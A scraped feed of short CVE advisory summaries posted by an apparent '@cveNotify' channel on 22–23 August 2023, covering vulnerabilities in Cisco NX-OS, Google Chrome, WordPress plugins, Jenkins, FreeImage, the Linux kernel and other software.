🚨 CVE-2023-20115A vulnerability in the SFTP server implementation for Cisco Nexus 3000 Series Switches and 9000 Series Switches in standalone NX-OS mode could allow an authenticated, remote attacker to download or overwrite files from the underlying operating system of an affected device. This vulnerability is due to a logic error when verifying the user role when an SFTP connection is opened to an affected device. An attacker could exploit this vulnerability by connecting and authenticating via SFTP as a valid, non-administrator user. A successful exploit could allow the attacker to read or overwrite files from the underlying operating system with the privileges of the authenticated user. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2023-08-23 23:58:16 |
🚨 CVE-2023-20168A vulnerability in TACACS+ and RADIUS remote authentication for Cisco NX-OS Software could allow an unauthenticated, local attacker to cause an affected device to unexpectedly reload. This vulnerability is due to incorrect input validation when processing an authentication attempt if the directed request option is enabled for TACACS+ or RADIUS. An attacker could exploit this vulnerability by entering a crafted string at the login prompt of an affected device. A successful exploit could allow the attacker to cause the affected device to unexpectedly reload, resulting in a denial of service (DoS) condition. 🎖@cveNotify |
|
| 2023-08-23 12:58:18 |
🚨 CVE-2023-3899A vulnerability was found in subscription-manager that allows local privilege escalation due to inadequate authorization. The D-Bus interface com.redhat.RHSM1 exposes a significant number of methods to all users that could change the state of the registration. By using the com.redhat.RHSM1.Config.SetAll() method, a low-privileged local user could tamper with the state of the registration, by unregistering the system or by changing the current entitlements. This flaw allows an attacker to set arbitrary configuration directives for /etc/rhsm/rhsm.conf, which can be abused to cause a local privilege escalation to an unconfined root.🎖@cveNotify |
|
| 2023-08-23 10:58:22 |
🚨 CVE-2023-41104libvmod-digest before 1.0.3, as used in Varnish Enterprise 6.0.x before 6.0.11r5, has an out-of-bounds memory access during base64 decoding, leading to both authentication bypass and information disclosure; however, the exact attack surface will depend on the particular VCL (Varnish Configuration Language) configuration in use.🎖@cveNotify |
|
| 2023-08-23 10:58:21 |
🚨 CVE-2023-41105An issue was discovered in Python 3.11 through 3.11.4. If a path containing '\0' bytes is passed to os.path.normpath(), the path will be truncated unexpectedly at the first '\0' byte. There are plausible cases in which an application would have rejected a filename for security reasons in Python 3.10.x or earlier, but that filename is no longer rejected in Python 3.11.x.🎖@cveNotify |
|
| 2023-08-23 10:58:20 |
🚨 CVE-2023-41098An issue was discovered in MISP 2.4.174. In app/Controller/DashboardsController.php, a reflected XSS issue exists via the id parameter upon a dashboard edit.🎖@cveNotify |
|
| 2023-08-23 10:58:19 |
🚨 CVE-2023-41100An issue was discovered in the hcaptcha (aka hCaptcha for EXT:form) extension before 2.1.2 for TYPO3. It fails to check that the required captcha field is submitted in the form data. allowing a remote user to bypass the CAPTCHA check.🎖@cveNotify |
|
| 2023-08-23 10:58:18 |
🚨 CVE-2023-4041Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Out-of-bounds Write, Download of Code Without Integrity Check vulnerability in Silicon Labs Gecko Bootloader on ARM (Firmware Update File Parser modules) allows Code Injection, Authentication Bypass.This issue affects "Standalone" and "Application" versions of Gecko Bootloader.🎖@cveNotify |
|
| 2023-08-23 06:58:34 |
🚨 CVE-2023-4427Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-23 06:58:33 |
🚨 CVE-2023-4428Out of bounds memory access in CSS in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-23 06:58:31 |
🚨 CVE-2023-4429Use after free in Loader in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-23 06:58:30 |
🚨 CVE-2023-4430Use after free in Vulkan in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-23 06:58:29 |
🚨 CVE-2023-4431Out of bounds memory access in Fonts in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-23 06:58:27 |
🚨 CVE-2022-44729Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16.On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later.🎖@cveNotify |
|
| 2023-08-23 06:58:26 |
🚨 CVE-2022-44730Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16.A malicious SVG can probe user profile / data and send it directly as parameter to a URL.🎖@cveNotify |
|
| 2023-08-23 06:58:25 |
🚨 CVE-2023-40027Keystone is an open source headless CMS for Node.js — built with GraphQL and React. When `ui.isAccessAllowed` is set as `undefined`, the `adminMeta` GraphQL query is publicly accessible (no session required). This is different to the behaviour of the default AdminUI middleware, which by default will only be publicly accessible (no session required) if a `session` strategy is not defined. This vulnerability does not affect developers using the `@keystone-6/auth` package, or any users that have written their own `ui.isAccessAllowed` (that is to say, `isAccessAllowed` is not `undefined`). This vulnerability does affect users who believed that their `session` strategy will, by default, enforce that `adminMeta` is inaccessible by the public in accordance with that strategy; akin to the behaviour of the AdminUI middleware. This vulnerability has been patched in `@keystone-6/core` version `5.5.1`. Users are advised to upgrade. Users unable to upgrade may opt to write their own `isAccessAllowed` functionality to work-around this vulnerability.🎖@cveNotify |
|
| 2023-08-23 06:58:24 |
🚨 CVE-2023-40028Ghost is an open source content management system. Versions prior to 5.59.1 are subject to a vulnerability which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder. Version 5.59.1 contains a fix for this issue. All users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-23 06:58:22 |
🚨 CVE-2023-40013SVG Loader is a javascript library that fetches SVGs using XMLHttpRequests and injects the SVG code in the tag's place. According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in Cross-site Scripting (XSS). When trying to sanitize the svg the lib removes event attributes such as `onmouseover`, `onclick` but the list of events is not exhaustive. Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack. This issue has been addressed in commit `d3562fc08` which is included in releases from 1.6.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-23 06:58:21 |
🚨 CVE-2023-4265Potential buffer overflow vulnerabilities in the following locations: https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/usb/device/usb_dc_native_posix.c#L359 https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/usb/device/usb_dc_native_posix.c#L359 https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/usb/device/class/netusb/function_rndis... https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/usb/device/class/netusb/function_rndis.c#L841 🎖@cveNotify |
|
| 2023-08-23 00:58:55 |
🚨 CVE-2023-20201Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of an affected interface to view a page containing malicious HTML or script content. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid credentials to access the web-based management interface of the affected device.🎖@cveNotify |
|
| 2023-08-23 00:58:54 |
🚨 CVE-2023-4389A flaw was found in btrfs_get_root_ref in fs/btrfs/disk-io.c in the btrfs filesystem in the Linux Kernel due to a double decrement of the reference count. This issue may allow a local attacker with user privilege to crash the system or may lead to leaked internal kernel information.🎖@cveNotify |
|
| 2023-08-23 00:58:52 |
🚨 CVE-2023-4385A NULL pointer dereference flaw was found in dbFree in fs/jfs/jfs_dmap.c in the journaling file system (JFS) in the Linux Kernel. This issue may allow a local attacker to crash the system due to a missing sanity check.🎖@cveNotify |
|
| 2023-08-23 00:58:50 |
🚨 CVE-2023-40351A cross-site request forgery (CSRF) vulnerability in Jenkins Favorite View Plugin 5.v77a_37f62782d and earlier allows attackers to add or remove views from another user's favorite views tab bar.🎖@cveNotify |
|
| 2023-08-23 00:58:48 |
🚨 CVE-2023-38737IBM WebSphere Application Server Liberty 22.0.0.13 through 23.0.0.7 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. IBM X-Force ID: 262567.🎖@cveNotify |
|
| 2023-08-23 00:58:47 |
🚨 CVE-2023-32547Incorrect default permissions in the MAVinci Desktop Software for Intel(R) Falcon 8+ before version 6.2 may allow authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-23 00:58:45 |
🚨 CVE-2023-36671An issue was discovered in the Clario VPN client through 5.9.1.1662 for macOS. The VPN client insecurely configures the operating system such that all IP traffic to the VPN server's IP address is sent in plaintext outside the VPN tunnel even if this traffic is not generated by the VPN client. This allows an adversary to trick the victim into sending plaintext traffic to the VPN server's IP address and thereby deanonymize the victim. NOTE: the tunnelcrack.mathyvanhoef.com website uses this CVE ID to refer more generally to "ServerIP attack for only traffic to the real IP address of the VPN server" rather than to only Clario.🎖@cveNotify |
|
| 2023-08-23 00:58:44 |
🚨 CVE-2023-20203Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of an affected interface to view a page containing malicious HTML or script content. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid credentials to access the web-based management interface of the affected device.🎖@cveNotify |
|
| 2023-08-23 00:58:42 |
🚨 CVE-2023-20222A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-08-23 00:58:41 |
🚨 CVE-2023-20205Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of an affected interface to view a page containing malicious HTML or script content. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid credentials to access the web-based management interface of the affected device.🎖@cveNotify |
|
| 2023-08-23 00:58:39 |
🚨 CVE-2023-4382A vulnerability, which was classified as problematic, has been found in tdevs Hyip Rio 2.1. Affected by this issue is some unknown functionality of the file /user/settings of the component Profile Settings. The manipulation of the argument avatar leads to cross site scripting. The attack may be launched remotely. VDB-237314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-23 00:58:37 |
🚨 CVE-2020-24113Directory Traversal vulnerability in Contacts File Upload Interface in Yealink W60B version 77.83.0.85, allows attackers to gain sensitive information and cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-08-23 00:58:35 |
🚨 CVE-2023-38733IBM Robotic Process Automation 21.0.0 through 21.0.7.1 and 23.0.0 through 23.0.1 server could allow an authenticated user to view sensitive information from installation logs. IBM X-Force Id: 262293.🎖@cveNotify |
|
| 2023-08-23 00:58:33 |
🚨 CVE-2023-38734IBM Robotic Process Automation 21.0.0 through 21.0.7.1 and 23.0.0 through 23.0.1 is vulnerable to incorrect privilege assignment when importing users from an LDAP directory. IBM X-Force ID: 262481.🎖@cveNotify |
|
| 2023-08-23 00:58:31 |
🚨 CVE-2023-39026Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.🎖@cveNotify |
|
| 2023-08-23 00:58:29 |
🚨 CVE-2023-40370IBM Robotic Process Automation 21.0.0 through 21.0.7.1 runtime is vulnerable to information disclosure of script content if the remote REST request computer policy is enabled. IBM X-Force ID: 263470.🎖@cveNotify |
|
| 2023-08-23 00:58:28 |
🚨 CVE-2023-31492Zoho ManageEngine ADManager Plus version 7182 and prior disclosed the default passwords for the account restoration of unauthorized domains to the authenticated users.🎖@cveNotify |
|
| 2023-08-23 00:58:26 |
🚨 CVE-2023-39910The cryptocurrency wallet entropy seeding mechanism used in Libbitcoin Explorer 3.0.0 through 3.6.0 is weak, aka the Milk Sad issue. The use of an mt19937 Mersenne Twister PRNG restricts the internal entropy to 32 bits regardless of settings. This allows remote attackers to recover any wallet private keys generated from "bx seed" entropy output and steal funds. (Affected users need to move funds to a secure new cryptocurrency wallet.) NOTE: the vendor's position is that there was sufficient documentation advising against "bx seed" but others disagree. NOTE: this was exploited in the wild in June and July 2023.🎖@cveNotify |
|
| 2023-08-23 00:58:25 |
🚨 CVE-2021-37386Furukawa Electric LatAm 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via the serial number update function.🎖@cveNotify |
|
| 2023-08-23 00:58:23 |
🚨 CVE-2023-39341"FFRI yarai", "FFRI yarai Home and Business Edition" and their OEM products handle exceptional conditions improperly, which may lead to denial-of-service (DoS) condition. Affected products and versions are as follows: FFRI yarai versions 3.4.0 to 3.4.6 and 3.5.0, FFRI yarai Home and Business Edition version 1.4.0, InfoTrace Mark II Malware Protection (Mark II Zerona) versions 3.0.1 to 3.2.2, Zerona / Zerona PLUS versions 3.2.32 to 3.2.36, ActSecure ? versions 3.4.0 to 3.4.6 and 3.5.0, Dual Safe Powered by FFRI yarai version 1.4.1, EDR Plus Pack (Bundled FFRI yarai versions 3.4.0 to 3.4.6 and 3.5.0), and EDR Plus Pack Cloud (Bundled FFRI yarai versions 3.4.0 to 3.4.6 and 3.5.0).🎖@cveNotify |
|
| 2023-08-22 22:58:40 |
🚨 CVE-2020-19189Buffer Overflow vulnerability in postprocess_terminfo function in tinfo/parse_entry.c:997 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-08-22 22:58:39 |
🚨 CVE-2020-21428Buffer Overflow vulnerability in function LoadRGB in PluginDDS.cpp in FreeImage 3.18.0 allows remote attackers to run arbitrary code and cause other impacts via crafted image file.🎖@cveNotify |
|
| 2023-08-22 22:58:38 |
🚨 CVE-2020-19726An issue was discovered in binutils libbfd.c 2.36 relating to the auxiliary symbol data allows attackers to read or write to system memory or cause a denial of service.🎖@cveNotify |
|
| 2023-08-22 22:58:37 |
🚨 CVE-2020-20813Control Channel in OpenVPN 2.4.7 and earlier allows remote attackers to cause a denial of service via crafted reset packet.🎖@cveNotify |
|
| 2023-08-22 22:58:36 |
🚨 CVE-2020-21687Buffer Overflow vulnerability in scan function in stdscan.c in nasm 2.15rc0 allows remote attackers to cause a denial of service via crafted asm file.🎖@cveNotify |
|
| 2023-08-22 22:58:35 |
🚨 CVE-2020-21723A Segmentation Fault issue discovered StreamSerializer::extractStreams function in streamSerializer.cpp in oggvideotools 0.9.1 allows remote attackers to cause a denial of service (crash) via opening of crafted ogg file.🎖@cveNotify |
|
| 2023-08-22 22:58:34 |
🚨 CVE-2020-21710A divide by zero issue discovered in eps_print_page in gdevepsn.c in Artifex Software GhostScript 9.50 allows remote attackers to cause a denial of service via opening of crafted PDF file.🎖@cveNotify |
|
| 2023-08-22 22:58:33 |
🚨 CVE-2020-21890Buffer Overflow vulnerability in clj_media_size function in devices/gdevclj.c in Artifex Ghostscript 9.50 allows remote attackers to cause a denial of service or other unspecified impact(s) via opening of crafted PDF document.🎖@cveNotify |
|
| 2023-08-22 22:58:32 |
🚨 CVE-2020-21896A Use After Free vulnerability in svg_dev_text_span_as_paths_defs function in source/fitz/svg-device.c in Artifex Software MuPDF 1.16.0 allows remote attackers to cause a denial of service via opening of a crafted PDF file.🎖@cveNotify |
|
| 2023-08-22 22:58:31 |
🚨 CVE-2020-21686A stack-use-after-scope issue discovered in expand_mmac_params function in preproc.c in nasm before 2.15.04 allows remote attackers to cause a denial of service via crafted asm file.🎖@cveNotify |
|
| 2023-08-22 22:58:30 |
🚨 CVE-2020-22217Buffer overflow vulnerability in c-ares before 1_16_1 thru 1_17_0 via function ares_parse_soa_reply in ares_parse_soa_reply.c.🎖@cveNotify |
|
| 2023-08-22 22:58:29 |
🚨 CVE-2020-21699The web server Tengine 2.2.2 developed in the Nginx version from 0.5.6 thru 1.13.2 is vulnerable to an integer overflow vulnerability in the nginx range filter module, resulting in the leakage of potentially sensitive information triggered by specially crafted requests.🎖@cveNotify |
|
| 2023-08-22 22:58:28 |
🚨 CVE-2020-22524Buffer Overflow vulnerability in FreeImage_Load function in FreeImage Library 3.19.0(r1828) allows attackers to cuase a denial of service via crafted PFM file.🎖@cveNotify |
|
| 2023-08-22 22:58:27 |
🚨 CVE-2020-21724Buffer Overflow vulnerability in ExtractorInformation function in streamExtractor.cpp in oggvideotools 0.9.1 allows remaote attackers to run arbitrary code via opening of crafted ogg file.🎖@cveNotify |
|
| 2023-08-22 22:58:26 |
🚨 CVE-2020-22181A reflected cross site scripting (XSS) vulnerability was discovered on Samsung sww-3400rw Router devices via the m2 parameter of the sess-bin/command.cgi🎖@cveNotify |
|
| 2023-08-22 22:58:21 |
🚨 CVE-2020-23793An issue was discovered in spice-server spice-server-0.14.0-6.el7_6.1.x86_64 of Redhat's VDI product. There is a security vulnerablility that can restart KVMvirtual machine without any authorization. It is not yet known if there will be other other effects.🎖@cveNotify |
|
| 2023-08-22 22:58:20 |
🚨 CVE-2020-24294Buffer Overflow vulnerability in psdParser::UnpackRLE function in PSDParser.cpp in FreeImage 3.19.0 [r1859] allows remote attackers to cuase a denial of service via opening of crafted psd file.🎖@cveNotify |
|
| 2023-08-22 22:58:19 |
🚨 CVE-2021-32420dpic 2021.01.01 has a Heap-based Buffer Overflow in thestorestring function in dpic.y.🎖@cveNotify |
|
| 2023-08-22 22:58:18 |
🚨 CVE-2020-26652An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2023-08-22 18:58:42 |
🚨 CVE-2023-4241lol-html can cause panics on certain HTML inputs. Anyone processing arbitrary 3rd party HTML with the library is affected.🎖@cveNotify |
|
| 2023-08-22 18:58:40 |
🚨 CVE-2023-0551The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments🎖@cveNotify |
|
| 2023-08-22 18:58:35 |
🚨 CVE-2023-22957An issue was discovered in libac_des3.so on AudioCodes VoIP desk phones through 3.4.4.1000. Due to the use of hard-coded cryptographic key, an attacker with access to backup or configuration files is able to decrypt encrypted values and retrieve sensitive information, e.g., the device root password.🎖@cveNotify |
|
| 2023-08-22 18:58:34 |
🚨 CVE-2023-1977The Booking Manager WordPress plugin before 2.0.29 does not validate URLs input in it's admin panel or in shortcodes for showing events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks on the sites internal network.🎖@cveNotify |
|
| 2023-08-22 18:58:33 |
🚨 CVE-2023-2122The Image Optimizer by 10web WordPress plugin before 1.0.27 does not sanitise and escape the iowd_tabs_active parameter before rendering it in the plugin admin panel, leading to a reflected Cross-Site Scripting vulnerability, allowing an attacker to trick a logged in admin to execute arbitrary javascript by clicking a link.🎖@cveNotify |
|
| 2023-08-22 18:58:32 |
🚨 CVE-2023-2123The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.🎖@cveNotify |
|
| 2023-08-22 18:58:31 |
🚨 CVE-2023-2225The SEO ALert WordPress plugin through 1.59 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-08-22 18:58:27 |
🚨 CVE-2023-2254The Ko-fi Button WordPress plugin before 1.3.3 does not properly some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup), and we consider it a low risk.🎖@cveNotify |
|
| 2023-08-22 18:58:26 |
🚨 CVE-2023-2271The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack🎖@cveNotify |
|
| 2023-08-22 18:58:25 |
🚨 CVE-2023-2272The Tiempo.com WordPress plugin through 0.1.2 does not sanitise and escape the page parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-08-22 18:58:24 |
🚨 CVE-2023-4381Unverified Password Change in GitHub repository instantsoft/icms2 prior to 2.16.1-git.🎖@cveNotify |
|
| 2023-08-22 18:58:23 |
🚨 CVE-2020-26037Directory Traversal vulnerability in Server functionalty in Even Balance Punkbuster version 1.902 before 1.905 allows remote attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-22 16:59:13 |
🚨 CVE-2023-4363Inappropriate implementation in WebShare in Google Chrome on Android prior to 116.0.5845.96 allowed a remote attacker to spoof the contents of a dialog URL via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-22 16:59:12 |
🚨 CVE-2023-4362Heap buffer overflow in Mojom IDL in Google Chrome prior to 116.0.5845.96 allowed a remote attacker who had compromised the renderer process and gained control of a WebUI process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-22 16:59:11 |
🚨 CVE-2023-38915File Upload vulnerability in Wolf-leo EasyAdmin8 v.1.0 allows a remote attacker to execute arbtirary code via the upload type function.🎖@cveNotify |
|
| 2023-08-22 16:59:10 |
🚨 CVE-2020-27673An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. Guest OS users can cause a denial of service (host OS hang) via a high rate of events to dom0, aka CID-e99502f76271.🎖@cveNotify |
|
| 2023-08-22 16:59:06 |
🚨 CVE-2023-32748The Linux DVS server component of Mitel MiVoice Connect through 19.3 SP2 (22.24.1500.0) could allow an unauthenticated attacker with internal network access to execute arbitrary scripts due to improper access control.🎖@cveNotify |
|
| 2023-08-22 16:59:05 |
🚨 CVE-2023-38840Bitwarden Desktop 2023.7.0 and below allows an attacker with local access to obtain sensitive information via the Bitwarden.exe process.🎖@cveNotify |
|
| 2023-08-22 16:59:04 |
🚨 CVE-2023-38687Svelecte is a flexible autocomplete/select component written in Svelte. Svelecte item names are rendered as raw HTML with no escaping. This allows the injection of arbitrary HTML into the Svelecte dropdown. This can be exploited to execute arbitrary JavaScript whenever a Svelecte dropdown is opened. Item names given to Svelecte appear to be directly rendered as HTML by the default item renderer. This means that any HTML tags in the name are rendered as HTML elements not as text. Note that the custom item renderer shown in https://mskocik.github.io/svelecte/#item-rendering is also vulnerable to the same exploit. Any site that uses Svelecte with dynamically created items either from an external source or from user-created content could be vulnerable to an XSS attack (execution of untrusted JavaScript), clickjacking or any other attack that can be performed with arbitrary HTML injection. The actual impact of this vulnerability for a specific application depends on how trustworthy the sources that provide Svelecte items are and the steps that the application has taken to mitigate XSS attacks. XSS attacks using this vulnerability are mostly mitigated by a Content Security Policy that blocks inline JavaScript. This issue has been addressed in version 3.16.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-22 16:59:00 |
🚨 CVE-2023-29468The Texas Instruments (TI) WiLink WL18xx MCP driver does not limit the number of information elements (IEs) of type XCC_EXT_1_IE_ID or XCC_EXT_2_IE_ID that can be parsed in a management frame. Using a specially crafted frame, a buffer overflow can be triggered that can potentially lead to remote code execution. This affects WILINK8-WIFI-MCP8 version 8.5_SP3 and earlier.🎖@cveNotify |
|
| 2023-08-22 16:58:59 |
🚨 CVE-2023-40020PrivateUploader is an open source image hosting server written in Vue and TypeScript. In affected versions `app/routes/v3/admin.controller.ts` did not correctly verify whether the user was an administrator (High Level) or moderator (Low Level) causing the request to continue processing. The response would be a 403 with ADMIN_ONLY, however, next() would call leading to any updates/changes in the route to process. This issue has been addressed in version 3.2.49. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-22 16:58:58 |
🚨 CVE-2023-39947eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6, even after the fix at commit 3492270, malformed `PID_PROPERTY_LIST` parameters cause heap overflow at a different program counter. This can remotely crash any Fast-DDS process. Versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6 contain a patch for this issue.🎖@cveNotify |
|
| 2023-08-22 16:58:54 |
🚨 CVE-2023-39946eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6, heap can be overflowed by providing a PID_PROPERTY_LIST parameter that contains a CDR string with length larger than the size of actual content. In `eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper`, `memcpy` is called to first copy the octet'ized length and then to copy the data into `properties_.data`. At the second memcpy, both `data` and `size` can be controlled by anyone that sends the CDR string to the discovery multicast port. This can remotely crash any Fast-DDS process. Versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6 contain a patch for this issue.🎖@cveNotify |
|
| 2023-08-22 16:58:53 |
🚨 CVE-2023-24478Use of insufficiently random values for some Intel Agilex(R) software included as part of Intel(R) Quartus(R) Prime Pro Edition for linux before version 22.4 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-22 16:58:52 |
🚨 CVE-2023-32494Dell PowerScale OneFS, 8.0.x-9.5.x, contains an improper handling of insufficient privileges vulnerability. A local privileged attacker could potentially exploit this vulnerability, leading to elevation of privilege and affect in compliance mode also.🎖@cveNotify |
|
| 2023-08-22 16:58:51 |
🚨 CVE-2023-32004A vulnerability has been discovered in Node.js version 20, specifically within the experimental permission model. This flaw relates to improper handling of Buffers in file system APIs causing a traversal path to bypass when verifying file permissions.This vulnerability affects all users using the experimental permission model in Node.js 20.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-08-22 14:58:49 |
🚨 CVE-2023-0274The URL Params WordPress plugin before 2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-08-22 14:58:48 |
🚨 CVE-2023-0579The YARPP WordPress plugin before 5.30.3 does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.🎖@cveNotify |
|
| 2023-08-22 14:58:47 |
🚨 CVE-2023-1110The Yellow Yard Searchbar WordPress plugin before 2.8.12 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-08-22 14:58:45 |
🚨 CVE-2023-1465The WP EasyPay WordPress plugin before 4.1 does not escape some generated URLs before outputting them back in pages, leading to Reflected Cross-Site Scripting issues which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-08-22 14:58:44 |
🚨 CVE-2023-38906An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via the authentication code for the UDP message.🎖@cveNotify |
|
| 2023-08-22 14:58:43 |
🚨 CVE-2023-38908An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via the TSKEP authentication function.🎖@cveNotify |
|
| 2023-08-22 14:58:42 |
🚨 CVE-2023-38909An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via the IV component in the AES128-CBC function.🎖@cveNotify |
|
| 2023-08-22 14:58:41 |
🚨 CVE-2023-4301A cross-site request forgery (CSRF) vulnerability in Jenkins Fortify Plugin 22.1.38 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-22 14:58:40 |
🚨 CVE-2023-4302A missing permission check in Jenkins Fortify Plugin 22.1.38 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-22 14:58:38 |
🚨 CVE-2023-4303Jenkins Fortify Plugin 22.1.38 and earlier does not escape the error message for a form validation method, resulting in an HTML injection vulnerability.🎖@cveNotify |
|
| 2023-08-22 14:58:37 |
🚨 CVE-2023-36787Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-08-22 14:58:36 |
🚨 CVE-2023-38158Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
